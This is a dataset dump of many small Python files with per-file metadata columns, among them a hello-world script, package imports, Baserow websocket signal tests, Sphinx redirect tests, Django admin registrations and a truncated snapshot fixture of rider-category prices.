] | null | null | null | hello.py | AryannaD/MB215-Lab1 | e507dd8f49a0a0953a57189acdba9452998317fa | [
"MIT"
] | null | null | null | print("hello world from Aryanna" | 32 | 32 | 0.8125 | 5 | 32 | 5.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.896552 | 0 | 0 | 0 | 0 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
21979519c341b30d90eadd5d1c593124a3695ef6 | 18 | py | Python | CoinFlip/__init__.py | Xc1d30us-Mercy/CoinFlip | 7d14f7aff32fafe4d6dba1971df513159c261263 | [
"MIT"
] | null | null | null | CoinFlip/__init__.py | Xc1d30us-Mercy/CoinFlip | 7d14f7aff32fafe4d6dba1971df513159c261263 | [
"MIT"
] | null | null | null | CoinFlip/__init__.py | Xc1d30us-Mercy/CoinFlip | 7d14f7aff32fafe4d6dba1971df513159c261263 | [
"MIT"
] | 1 | 2018-07-30T04:37:49.000Z | 2018-07-30T04:37:49.000Z | from . import Coin | 18 | 18 | 0.777778 | 3 | 18 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 18 | 1 | 18 | 18 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
219dd90709adc5fa30d3f98dd8265c87d716f0e7 | 178 | py | Python | runner/helper.py | shibamirai/python_koans | c1eba327dbe9534042e510dfce4e0c49c853255e | [
"MIT"
] | null | null | null | runner/helper.py | shibamirai/python_koans | c1eba327dbe9534042e510dfce4e0c49c853255e | [
"MIT"
] | null | null | null | runner/helper.py | shibamirai/python_koans | c1eba327dbe9534042e510dfce4e0c49c853255e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def cls_name(obj):
doc = obj.__class__.__doc__ + ": " if obj.__class__.__doc__ else ""
return doc + obj.__class__.__name__ | 29.666667 | 72 | 0.646067 | 25 | 178 | 3.6 | 0.64 | 0.266667 | 0.244444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006849 | 0.179775 | 178 | 6 | 73 | 29.666667 | 0.609589 | 0.235955 | 0 | 0 | 0 | 0 | 0.014815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
21c56842fa48edc404535f77ee1a5cdf0999f3a0 | 5,468 | py | Python | backend/tests/baserow/ws/test_ws_signals.py | ericderace/baserow | 7b35e81f75166d914d07ef4ad0c30c625b6bb396 | [
"MIT"
] | 1 | 2021-04-13T16:27:58.000Z | 2021-04-13T16:27:58.000Z | backend/tests/baserow/ws/test_ws_signals.py | jacklicn/baserow | 978d9462ededbaa96674a6653028ba19876ea273 | [
"MIT"
] | 6 | 2021-04-08T22:03:06.000Z | 2022-01-13T03:38:17.000Z | backend/tests/baserow/ws/test_ws_signals.py | jacklicn/baserow | 978d9462ededbaa96674a6653028ba19876ea273 | [
"MIT"
] | null | null | null | import pytest
from unittest.mock import patch
from baserow.core.handler import CoreHandler
@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_group_created(mock_broadcast_to_group, data_fixture):
user = data_fixture.create_user()
group_user = CoreHandler().create_group(user=user, name='Test')
mock_broadcast_to_group.delay.assert_called_once()
args = mock_broadcast_to_group.delay.call_args
assert args[0][0] == group_user.group_id
assert args[0][1]['type'] == 'group_created'
assert args[0][1]['group']['id'] == group_user.group_id
@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_group_updated(mock_broadcast_to_group, data_fixture):
user = data_fixture.create_user()
user.web_socket_id = 'test'
group = data_fixture.create_group(user=user)
group = CoreHandler().update_group(user=user, group=group, name='Test')
mock_broadcast_to_group.delay.assert_called_once()
args = mock_broadcast_to_group.delay.call_args
assert args[0][0] == group.id
assert args[0][1]['type'] == 'group_updated'
assert args[0][1]['group_id'] == group.id
assert args[0][1]['group']['id'] == group.id
assert args[0][2] == 'test'
@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_users')
def test_group_deleted(mock_broadcast_to_users, data_fixture):
user = data_fixture.create_user()
group = data_fixture.create_group(user=user)
group_id = group.id
CoreHandler().delete_group(user=user, group=group)
mock_broadcast_to_users.delay.assert_called_once()
args = mock_broadcast_to_users.delay.call_args
assert args[0][0] == [user.id]
assert args[0][1]['type'] == 'group_deleted'
assert args[0][1]['group_id'] == group_id
@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_users')
def test_group_user_updated(mock_broadcast_to_users, data_fixture):
user_1 = data_fixture.create_user()
user_2 = data_fixture.create_user()
group = data_fixture.create_group()
group_user_1 = data_fixture.create_user_group(user=user_1, group=group)
data_fixture.create_user_group(user=user_2, group=group)
CoreHandler().update_group_user(user=user_2, group_user=group_user_1,
permissions='MEMBER')
mock_broadcast_to_users.delay.assert_called_once()
args = mock_broadcast_to_users.delay.call_args
assert args[0][0] == [user_1.id]
assert args[0][1]['type'] == 'group_updated'
assert args[0][1]['group']['id'] == group.id
assert args[0][1]['group']['name'] == group.name
assert args[0][1]['group']['permissions'] == 'MEMBER'
assert args[0][1]['group_id'] == group.id
@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_users')
def test_group_user_deleted(mock_broadcast_to_users, data_fixture):
user_1 = data_fixture.create_user()
user_2 = data_fixture.create_user()
group = data_fixture.create_group()
group_user_1 = data_fixture.create_user_group(user=user_1, group=group)
data_fixture.create_user_group(user=user_2, group=group)
CoreHandler().delete_group_user(user=user_2, group_user=group_user_1)
mock_broadcast_to_users.delay.assert_called_once()
args = mock_broadcast_to_users.delay.call_args
assert args[0][0] == [user_1.id]
assert args[0][1]['type'] == 'group_deleted'
assert args[0][1]['group_id'] == group.id
@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_application_created(mock_broadcast_to_group, data_fixture):
user = data_fixture.create_user()
group = data_fixture.create_group(user=user)
database = CoreHandler().create_application(user=user, group=group,
type_name='database', name='Database')
mock_broadcast_to_group.delay.assert_called_once()
args = mock_broadcast_to_group.delay.call_args
assert args[0][0] == group.id
assert args[0][1]['type'] == 'application_created'
assert args[0][1]['application']['id'] == database.id
@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_application_updated(mock_broadcast_to_group, data_fixture):
user = data_fixture.create_user()
database = data_fixture.create_database_application(user=user)
CoreHandler().update_application(user=user, application=database, name='Database')
mock_broadcast_to_group.delay.assert_called_once()
args = mock_broadcast_to_group.delay.call_args
assert args[0][0] == database.group_id
assert args[0][1]['type'] == 'application_updated'
assert args[0][1]['application_id'] == database.id
assert args[0][1]['application']['id'] == database.id
@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_application_deleted(mock_broadcast_to_group, data_fixture):
user = data_fixture.create_user()
database = data_fixture.create_database_application(user=user)
database_id = database.id
CoreHandler().delete_application(user=user, application=database)
mock_broadcast_to_group.delay.assert_called_once()
args = mock_broadcast_to_group.delay.call_args
assert args[0][0] == database.group_id
assert args[0][1]['type'] == 'application_deleted'
assert args[0][1]['application_id'] == database_id
| 40.80597 | 86 | 0.733358 | 788 | 5,468 | 4.766497 | 0.063452 | 0.093717 | 0.087859 | 0.067093 | 0.914271 | 0.870341 | 0.859691 | 0.853301 | 0.803248 | 0.803248 | 0 | 0.016017 | 0.132224 | 5,468 | 133 | 87 | 41.112782 | 0.775553 | 0 | 0 | 0.654206 | 0 | 0 | 0.115947 | 0.054133 | 0 | 0 | 0 | 0 | 0.35514 | 1 | 0.074766 | false | 0 | 0.028037 | 0 | 0.102804 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
df3c55916147e99b5b4dc3f58225935fd40f1476 | 257 | py | Python | buycoins_client/__init__.py | ChukwuEmekaAjah/buycoins_python | 86547aa742364a0e308b1dfb5f7c73b4467b1e06 | [
"MIT"
] | 1 | 2021-03-25T19:28:48.000Z | 2021-03-25T19:28:48.000Z | buycoins_client/__init__.py | ChukwuEmekaAjah/buycoins_python | 86547aa742364a0e308b1dfb5f7c73b4467b1e06 | [
"MIT"
] | null | null | null | buycoins_client/__init__.py | ChukwuEmekaAjah/buycoins_python | 86547aa742364a0e308b1dfb5f7c73b4467b1e06 | [
"MIT"
] | null | null | null | from .components import orders as Orders
from .components import auth as Auth
from .components import accounts as Accounts
from .components import prices as Prices
from .components import balances as Balances
from .components import transfers as Transfers
| 32.125 | 46 | 0.832685 | 36 | 257 | 5.944444 | 0.277778 | 0.392523 | 0.560748 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143969 | 257 | 7 | 47 | 36.714286 | 0.972727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
df8e0b6a72f3e55ae3ac9adc559edc0d4fd7f730 | 40 | py | Python | dbpl/__init__.py | gch1p/deadbeef-playlist | e56c47e4fcd88abb79e5d1347c75b72b624b213d | [
"BSD-2-Clause"
] | 1 | 2021-07-10T09:09:56.000Z | 2021-07-10T09:09:56.000Z | dbpl/__init__.py | gch1p/deadbeef-playlist | e56c47e4fcd88abb79e5d1347c75b72b624b213d | [
"BSD-2-Clause"
] | null | null | null | dbpl/__init__.py | gch1p/deadbeef-playlist | e56c47e4fcd88abb79e5d1347c75b72b624b213d | [
"BSD-2-Clause"
] | null | null | null | from .dbpl import Track, Playlist, Flag
| 20 | 39 | 0.775 | 6 | 40 | 5.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 40 | 1 | 40 | 40 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
10f87f0f03f5da0448348eb99f58b316d7bc6a5c | 1,251 | py | Python | tests/test_write_builder.py | sciencewhiz/sphinxext-rediraffe | fe953a466538b7a826b81d1a2f96a41b224bd016 | [
"MIT"
] | 19 | 2020-08-30T05:52:49.000Z | 2022-02-19T21:57:57.000Z | tests/test_write_builder.py | sciencewhiz/sphinxext-rediraffe | fe953a466538b7a826b81d1a2f96a41b224bd016 | [
"MIT"
] | 29 | 2020-08-21T01:36:14.000Z | 2021-09-16T12:20:33.000Z | tests/test_write_builder.py | sciencewhiz/sphinxext-rediraffe | fe953a466538b7a826b81d1a2f96a41b224bd016 | [
"MIT"
] | 7 | 2020-08-18T18:22:51.000Z | 2021-05-22T09:54:27.000Z | import pytest
from sphinx.testing.path import path
@pytest.fixture(scope="module")
def rootdir():
return path(__file__).parent.abspath() / "roots" / "builder"
@pytest.mark.sphinx("rediraffewritediff", testroot="renamed_write_file_not_redirected")
def test_builder_renamed_file_write_not_redirected(app_init_repo):
app_init_repo.build()
valid_string = '"another.rst" "another2.rst"'
with open(path(app_init_repo.srcdir).joinpath("redirects.txt"), "r") as file:
assert valid_string in file.readline()
@pytest.mark.sphinx("rediraffewritediff", testroot="renamed_write_file_perc_low_fail")
def test_builder_renamed_file_write_perc_low_fail(app_init_repo):
app_init_repo.build()
valid_string = '"another.rst" "another2.rst"'
with open(path(app_init_repo.srcdir).joinpath("redirects.txt"), "r") as file:
assert valid_string not in file.readline()
@pytest.mark.sphinx("rediraffewritediff", testroot="renamed_write_file_perc_low_pass")
def test_builder_renamed_file_write_perc_low_pass(app_init_repo):
app_init_repo.build()
valid_string = '"another.rst" "another2.rst"'
with open(path(app_init_repo.srcdir).joinpath("redirects.txt"), "r") as file:
assert valid_string in file.readline()
| 39.09375 | 87 | 0.761791 | 176 | 1,251 | 5.0625 | 0.278409 | 0.070707 | 0.111111 | 0.114478 | 0.819304 | 0.819304 | 0.785634 | 0.785634 | 0.637486 | 0.637486 | 0 | 0.002705 | 0.113509 | 1,251 | 31 | 88 | 40.354839 | 0.800721 | 0 | 0 | 0.478261 | 0 | 0 | 0.235811 | 0.077538 | 0 | 0 | 0 | 0 | 0.130435 | 1 | 0.173913 | false | 0.086957 | 0.086957 | 0.043478 | 0.304348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
80367e5b75d5450851b2ece95c6db71a3a0756f8 | 45 | py | Python | 13/test/src/__init__.py | leisurexi/python-study | e2de3d66d5decb4403acd2df6a3d9cba307f018a | [
"Apache-2.0"
] | 1 | 2021-01-23T14:59:02.000Z | 2021-01-23T14:59:02.000Z | 13/test/src/__init__.py | leisurexi/python-study | e2de3d66d5decb4403acd2df6a3d9cba307f018a | [
"Apache-2.0"
] | null | null | null | 13/test/src/__init__.py | leisurexi/python-study | e2de3d66d5decb4403acd2df6a3d9cba307f018a | [
"Apache-2.0"
] | null | null | null | # author: leisurexi
# date: 2021-01-16 22:16
| 15 | 24 | 0.688889 | 8 | 45 | 3.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.315789 | 0.155556 | 45 | 2 | 25 | 22.5 | 0.5 | 0.888889 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
33e703bc9e1f85b9812b70cffb61e8f0dd56b4f5 | 47 | py | Python | truetool/command_line.py | truecharts/truetool | e487c84139b70f868499892cdf308e31d48a8be9 | [
"BSD-3-Clause"
] | 12 | 2022-01-20T03:37:56.000Z | 2022-03-17T21:51:06.000Z | truetool/command_line.py | truecharts/truetool | e487c84139b70f868499892cdf308e31d48a8be9 | [
"BSD-3-Clause"
] | 2 | 2022-02-03T10:06:37.000Z | 2022-02-18T08:58:11.000Z | truetool/command_line.py | truecharts/truetool | e487c84139b70f868499892cdf308e31d48a8be9 | [
"BSD-3-Clause"
] | null | null | null | import truetool
def main():
truetool.run() | 11.75 | 18 | 0.680851 | 6 | 47 | 5.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191489 | 47 | 4 | 18 | 11.75 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
33f7e6f1c643c5b15f9094770e3f68e6385c478b | 19 | py | Python | wordsalad/utils/__init__.py | skurmedel/wordsalad | 5feaf29bf8b9c88624b783cd087a6589ea0ab48a | [
"MIT"
] | null | null | null | wordsalad/utils/__init__.py | skurmedel/wordsalad | 5feaf29bf8b9c88624b783cd087a6589ea0ab48a | [
"MIT"
] | null | null | null | wordsalad/utils/__init__.py | skurmedel/wordsalad | 5feaf29bf8b9c88624b783cd087a6589ea0ab48a | [
"MIT"
] | null | null | null | from .text import * | 19 | 19 | 0.736842 | 3 | 19 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 19 | 1 | 19 | 19 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1d361f98585118b5e0e8265ebbbe6ae175f42092 | 152 | py | Python | esercizi/while.py | gdv/python-alfabetizzazione | d87561222de8a230db11d8529c49cf1702aec326 | [
"MIT"
] | null | null | null | esercizi/while.py | gdv/python-alfabetizzazione | d87561222de8a230db11d8529c49cf1702aec326 | [
"MIT"
] | null | null | null | esercizi/while.py | gdv/python-alfabetizzazione | d87561222de8a230db11d8529c49cf1702aec326 | [
"MIT"
] | 1 | 2019-03-26T11:14:33.000Z | 2019-03-26T11:14:33.000Z | y=0.0
x=0.0
print "y = ", y, "\tx = ", x, "<- inizializzazione"
while y <= 10 :
y = 0.5 * x + 2
print "y = ", y, "\tx = ", x
x = x + 1.65
| 15.2 | 51 | 0.394737 | 29 | 152 | 2.068966 | 0.413793 | 0.066667 | 0.233333 | 0.3 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 0.348684 | 152 | 9 | 52 | 16.888889 | 0.484848 | 0 | 0 | 0 | 0 | 0 | 0.256579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.285714 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1d7e24dde5e3ed4d17cec1efcd2a8939ba257407 | 20 | py | Python | electrolysis/__init__.py | tjlane/electrolysis | 86a8df22e504c77030d5a4d43a61379fc134f058 | [
"MIT"
] | null | null | null | electrolysis/__init__.py | tjlane/electrolysis | 86a8df22e504c77030d5a4d43a61379fc134f058 | [
"MIT"
] | null | null | null | electrolysis/__init__.py | tjlane/electrolysis | 86a8df22e504c77030d5a4d43a61379fc134f058 | [
"MIT"
] | 1 | 2020-04-14T15:24:28.000Z | 2020-04-14T15:24:28.000Z | # init
import inout
| 6.666667 | 12 | 0.75 | 3 | 20 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 20 | 2 | 13 | 10 | 0.9375 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1d7f91eb48e7c699afbb15fd7db990841479d61a | 92 | py | Python | brewpi/recipes/views/__init__.py | trottmpq/brewpi | 5090f32d30e27cafe1594beba7bb8cd0aac8bfc6 | [
"MIT"
] | null | null | null | brewpi/recipes/views/__init__.py | trottmpq/brewpi | 5090f32d30e27cafe1594beba7bb8cd0aac8bfc6 | [
"MIT"
] | 9 | 2020-11-14T18:27:41.000Z | 2022-02-20T18:30:47.000Z | brewpi/recipes/views/__init__.py | trottmpq/brewpi | 5090f32d30e27cafe1594beba7bb8cd0aac8bfc6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""The api view module."""
from .blueprint import blueprint # noqa
| 23 | 40 | 0.630435 | 12 | 92 | 4.833333 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013158 | 0.173913 | 92 | 3 | 41 | 30.666667 | 0.75 | 0.521739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
1d8625f6f4fd29cc27a06091456250f68052afc5 | 48 | py | Python | test/__init__.py | ceos-seo/django-datacube-wcs | 250742947036763a95b19bdf132b2270d9bb5be9 | [
"Apache-2.0"
] | 7 | 2017-10-18T10:00:41.000Z | 2019-05-22T10:01:19.000Z | test/__init__.py | ceos-seo/django-datacube-wcs | 250742947036763a95b19bdf132b2270d9bb5be9 | [
"Apache-2.0"
] | null | null | null | test/__init__.py | ceos-seo/django-datacube-wcs | 250742947036763a95b19bdf132b2270d9bb5be9 | [
"Apache-2.0"
] | 4 | 2017-10-13T15:11:51.000Z | 2019-11-27T21:41:03.000Z | from .test_wcs_spec import TestWCSSpecification
| 24 | 47 | 0.895833 | 6 | 48 | 6.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 48 | 1 | 48 | 48 | 0.931818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d56e0a779559c57e948ff59fa343c486b9851284 | 23 | py | Python | example/controllers/__init__.py | codejamninja/cfoundation | 5cd8738952eb871badcc0632e2a2d3de52ec8af0 | [
"MIT"
] | 61 | 2016-04-19T00:14:37.000Z | 2022-03-14T03:49:05.000Z | frcbullet/cli/controllers/__init__.py | hopkinstechnocrats/frcbullet | ebc9ab35ff5d420428b91d0fc80edebcbc922ac0 | [
"MIT"
] | 38 | 2019-07-18T04:51:40.000Z | 2021-07-06T04:49:45.000Z | polire/base/__init__.py | sustainability-lab/spatial-interpolation | 42d90ae9da2e7318004650a648b9ebeb9718d0b7 | [
"BSD-3-Clause"
] | 24 | 2020-08-05T03:13:37.000Z | 2021-10-11T02:55:25.000Z | from .base import Base
| 11.5 | 22 | 0.782609 | 4 | 23 | 4.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d597f5e2ae13f8eba9a3541c6700080c56fe8c62 | 180 | py | Python | apps/usuario/admin.py | WilliamColmenares/Access_control | 6c4d07a55307fe9f876a796d3e7273188b7569d4 | [
"MIT"
] | 2 | 2017-06-22T13:50:56.000Z | 2021-09-16T14:07:50.000Z | apps/usuario/admin.py | WilliamColmenares/Access_control | 6c4d07a55307fe9f876a796d3e7273188b7569d4 | [
"MIT"
] | null | null | null | apps/usuario/admin.py | WilliamColmenares/Access_control | 6c4d07a55307fe9f876a796d3e7273188b7569d4 | [
"MIT"
] | 2 | 2017-06-08T17:18:29.000Z | 2021-04-17T22:20:34.000Z | from django.contrib import admin
from apps.usuario.models import PasswordCliente, HuellaDigital
admin.site.register(PasswordCliente)
admin.site.register(HuellaDigital)
| 20 | 63 | 0.805556 | 20 | 180 | 7.25 | 0.6 | 0.124138 | 0.234483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127778 | 180 | 8 | 64 | 22.5 | 0.923567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
d59b941b5964c465cd6373788f4857e487166335 | 27 | py | Python | 01_PREWORK/week02/pra/your-code/carlos_cabruja.py | ivanof11/The_Bridge_DataScience_PT_ALUMNI_feb22 | a85ebb1b85f49c0c163e8d24cd82531a7927af45 | [
"MIT"
] | 1 | 2022-02-05T13:09:26.000Z | 2022-02-05T13:09:26.000Z | 01_PREWORK/week02/pra/your-code/carlos_cabruja.py | ivanof11/The_Bridge_DataScience_PT_ALUMNI_feb22 | a85ebb1b85f49c0c163e8d24cd82531a7927af45 | [
"MIT"
] | null | null | null | 01_PREWORK/week02/pra/your-code/carlos_cabruja.py | ivanof11/The_Bridge_DataScience_PT_ALUMNI_feb22 | a85ebb1b85f49c0c163e8d24cd82531a7927af45 | [
"MIT"
] | null | null | null | print("Hello The Bridge!")
| 13.5 | 26 | 0.703704 | 4 | 27 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 27 | 1 | 27 | 27 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0.62963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
63359c1a11257151eac8d955f1fefe9af147c5e2 | 10,750 | py | Python | gtfs/tests/snapshots/snap_test_routes_api.py | montel-ig/maritime-maas | 68a3fe30d47745aba40ebf911d599346c070dfa4 | [
"MIT"
] | null | null | null | gtfs/tests/snapshots/snap_test_routes_api.py | montel-ig/maritime-maas | 68a3fe30d47745aba40ebf911d599346c070dfa4 | [
"MIT"
] | 34 | 2021-03-05T15:07:17.000Z | 2022-02-23T19:05:39.000Z | gtfs/tests/snapshots/snap_test_routes_api.py | montel-ig/maritime-maas | 68a3fe30d47745aba40ebf911d599346c070dfa4 | [
"MIT"
] | 1 | 2022-02-24T13:57:52.000Z | 2022-02-24T13:57:52.000Z | # -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots["test_rider_categories_with_prices 1"] = [
{
"customer_types": [
{
"currency_type": "EUR",
"description": "description of test rider category",
"id": "00000000-0000-0000-0000-000000000001",
"name": "name of test rider category",
"price": "1.00",
},
{
"currency_type": "EUR",
"description": "description of test rider category",
"id": "00000000-0000-0000-0000-000000000002",
